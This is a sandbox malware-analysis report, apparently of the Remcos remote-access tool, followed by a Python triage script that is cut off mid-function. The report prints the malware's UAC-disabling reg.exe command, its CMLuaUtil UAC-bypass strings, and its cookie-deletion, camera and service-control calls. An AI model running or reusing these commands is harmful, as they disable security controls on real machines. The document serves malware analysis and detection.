                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                  • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                  • API String ID: 37874593-122982132
                                                  • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                  • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                  • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                  • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                  APIs
                                                    • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                    • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                    • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                  • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                  • API String ID: 1133728706-4073444585
                                                  • Opcode ID: dc140ff0ad8dbd1b4c4f2402beb5034a0b843679da805c5092eb68dbd5419f07
                                                  • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                                  • Opcode Fuzzy Hash: dc140ff0ad8dbd1b4c4f2402beb5034a0b843679da805c5092eb68dbd5419f07
                                                  • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                                  • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                  • Opcode Fuzzy Hash: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                                  • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                  APIs
                                                    • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                  • _free.LIBCMT ref: 00450FC8
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 00450FD3
                                                  • _free.LIBCMT ref: 00450FDE
                                                  • _free.LIBCMT ref: 00451032
                                                  • _free.LIBCMT ref: 0045103D
                                                  • _free.LIBCMT ref: 00451048
                                                  • _free.LIBCMT ref: 00451053
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                  • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                  • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                  • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                  • int.LIBCPMT ref: 004111BE
                                                    • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                    • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                  • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                  • String ID: (mG
                                                  • API String ID: 2536120697-4059303827
                                                  • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                  • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                                  • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                  • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                  • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                  • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                  • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                  • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                  APIs
                                                  • CoInitializeEx.OLE32(00000000,00000002), ref: 0040760B
                                                    • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                    • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                  • CoUninitialize.OLE32 ref: 00407664
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  • API ID: InitializeObjectUninitialize_wcslen
                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                  • API String ID: 3851391207-1839356972
                                                  • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                  • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                  • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                  • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                  APIs
                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                  • GetLastError.KERNEL32 ref: 0040BB22
                                                  Strings
                                                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                  • [Chrome Cookies not found], xrefs: 0040BB3C
                                                  • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                  • UserProfile, xrefs: 0040BAE8
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  • API ID: DeleteErrorFileLast
                                                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                  • API String ID: 2018770650-304995407
                                                  • Opcode ID: 7f227baf29ba8510fc9076d17c15206364f61269e19861644170f4ec6218b3ea
                                                  • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                  • Opcode Fuzzy Hash: 7f227baf29ba8510fc9076d17c15206364f61269e19861644170f4ec6218b3ea
                                                  • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                  APIs
                                                  • AllocConsole.KERNEL32 ref: 0041CE35
                                                  • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                  • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  • API ID: Console$AllocOutputShowWindow
                                                  • String ID: Remcos v$5.1.1 Pro$CONOUT$
                                                  • API String ID: 2425139147-3820604032
                                                  • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                  • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                                  • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                  • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                                  APIs
                                                  • __allrem.LIBCMT ref: 0043ACE9
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                  • __allrem.LIBCMT ref: 0043AD1C
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                  • __allrem.LIBCMT ref: 0043AD51
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                  • String ID:
                                                  • API String ID: 1992179935-0
                                                  • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                  • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                  • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                  • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                  APIs
                                                  • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                                    • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  • API ID: H_prologSleep
                                                  • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                  • API String ID: 3469354165-3054508432
                                                  • Opcode ID: f1f6abde2fe9b8c9e3d75d7419095e2e3e0e7bba2c6e5661e2c4ad636e720d24
                                                  • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                                  • Opcode Fuzzy Hash: f1f6abde2fe9b8c9e3d75d7419095e2e3e0e7bba2c6e5661e2c4ad636e720d24
                                                  • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                                  APIs
                                                    • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                  • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 00411DE0
                                                  • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                                    • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                  • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                                  • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                                    • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                    • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000), ref: 00412129
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                  • String ID:
                                                  • API String ID: 3950776272-0
                                                  • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                  • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                  • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                  • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  • API ID: __cftoe
                                                  • String ID:
                                                  • API String ID: 4189289331-0
                                                  • Opcode ID: 8a4c5be280cb6c814f8e43a2c8dbee5c21d103d485289201cbd24c59527051e2
                                                  • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                  • Opcode Fuzzy Hash: 8a4c5be280cb6c814f8e43a2c8dbee5c21d103d485289201cbd24c59527051e2
                                                  • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                  • String ID:
                                                  • API String ID: 493672254-0
                                                  • Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                  • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                  • Opcode Fuzzy Hash: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                  • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                  APIs
                                                  • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                  • _free.LIBCMT ref: 004482CC
                                                  • _free.LIBCMT ref: 004482F4
                                                  • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                  • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                  • _abort.LIBCMT ref: 00448313
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  • API ID: ErrorLast$_free$_abort
                                                  • String ID:
                                                  • API String ID: 3160817290-0
                                                  • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                  • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                  • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                  • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                  • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                  • Opcode Fuzzy Hash: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                  • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                  • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                  • Opcode Fuzzy Hash: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                  • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                  • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                  • Opcode Fuzzy Hash: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                  • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ClassCreateErrorLastRegisterWindow
                                                  • String ID: 0$MsgWindowClass
                                                  • API String ID: 2877667751-2410386613
                                                  • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                  • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                  • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                  • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                  APIs
                                                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                  • CloseHandle.KERNEL32(?), ref: 004077E5
                                                  • CloseHandle.KERNEL32(?), ref: 004077EA
                                                  Strings
                                                  • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                  • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandle$CreateProcess
                                                  • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                  • API String ID: 2922976086-4183131282
                                                  • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                  • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                  • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                  • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
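The three service-control records above (OpenServiceW with access 0x20 or 0x40 followed by ControlService with codes 1, 2 and 3) and the CreateProcessA record that launches reg.exe to set EnableLUA to 0 are the calls a reviewer would want pulled out of the several thousand function records in this report. The following is an added example, not Joe Sandbox code and not part of the original report: a small Python triage script that parses the "• Api.MODULE(args), ref: addr" bullets in the report's own format, decodes the ControlService control code and the OpenServiceW access mask with the constants from winsvc.h, and flags the UAC-disabling reg.exe command line. The sample lines embedded in it are copied from the records above. Two caveats: the argument columns Joe prints are raw stack slots, so only the documented parameter positions are decoded; and the comma split assumes decoded strings contain no commas, which holds for the strings in this report.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Union

# Matches one bullet of an "APIs" list in a Joe Sandbox function record, e.g.
#   • ControlService.ADVAPI32(00000000,00000001,?,?), ref: 0041AB76
API_LINE = re.compile(
    r"^\s*•\s*(?P<name>\w+)\.(?P<module>[\w.]+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX32 = re.compile(r"^[0-9A-Fa-f]{8}$")

# Service control codes (winsvc.h): second argument of ControlService.
SERVICE_CONTROL = {
    1: "SERVICE_CONTROL_STOP",
    2: "SERVICE_CONTROL_PAUSE",
    3: "SERVICE_CONTROL_CONTINUE",
    4: "SERVICE_CONTROL_INTERROGATE",
}
# Service-specific access rights (winsvc.h): third argument of OpenServiceW.
SERVICE_ACCESS = {
    0x0001: "SERVICE_QUERY_CONFIG",
    0x0002: "SERVICE_CHANGE_CONFIG",
    0x0004: "SERVICE_QUERY_STATUS",
    0x0008: "SERVICE_ENUMERATE_DEPENDENTS",
    0x0010: "SERVICE_START",
    0x0020: "SERVICE_STOP",
    0x0040: "SERVICE_PAUSE_CONTINUE",
    0x0080: "SERVICE_INTERROGATE",
    0x0100: "SERVICE_USER_DEFINED_CONTROL",
}
# reg.exe command line that turns UAC off (EnableLUA = 0 under Policies\System).
UAC_OFF = re.compile(
    r"reg\.exe\s+ADD\s+HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"
    r"\s+/v\s+EnableLUA\s+/t\s+REG_DWORD\s+/d\s+0\b",
    re.IGNORECASE,
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Union[int, str]]  # 8-digit hex slots become int, everything else stays str
    ref: int


def parse_api_line(line: str) -> Optional[ApiCall]:
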